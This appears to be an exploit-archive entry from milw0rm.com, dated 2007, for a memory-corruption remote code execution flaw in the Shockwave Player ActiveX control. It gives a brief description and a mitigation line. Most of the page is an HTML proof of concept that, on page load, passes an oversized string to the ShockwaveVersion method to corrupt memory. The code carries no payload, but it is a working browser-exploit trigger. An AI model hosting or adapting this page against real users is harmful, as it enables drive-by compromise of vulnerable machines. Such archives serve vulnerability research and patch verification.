header-logo
Suggest Exploit
vendor:
Shockwave Player
by:
milw0rm.com

ActiveX Control Shockwave Version Remote Code Execution

The vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Shockwave Player when a user visits a malicious website. The specific flaw exists within the handling of the ShockwaveVersion method. By passing an overly long string to this function an attacker can corrupt memory in such a way that when the method returns it will reference invalid memory. An attacker can leverage this vulnerability to execute code under the context of the user running the browser.

Mitigation:

To mitigate this vulnerability, users should apply the latest updates from Adobe.
Source

Exploit-DB raw data:

<html>
 <head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";
     while (s.length < 768 * 768) s=s+s;
  
     var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}     

     obj.ShockwaveVersion(s);
    }
  </script>

 </head>  
 <body onload="JavaScript: return Check();" />
</html>

# milw0rm.com [2007-11-08]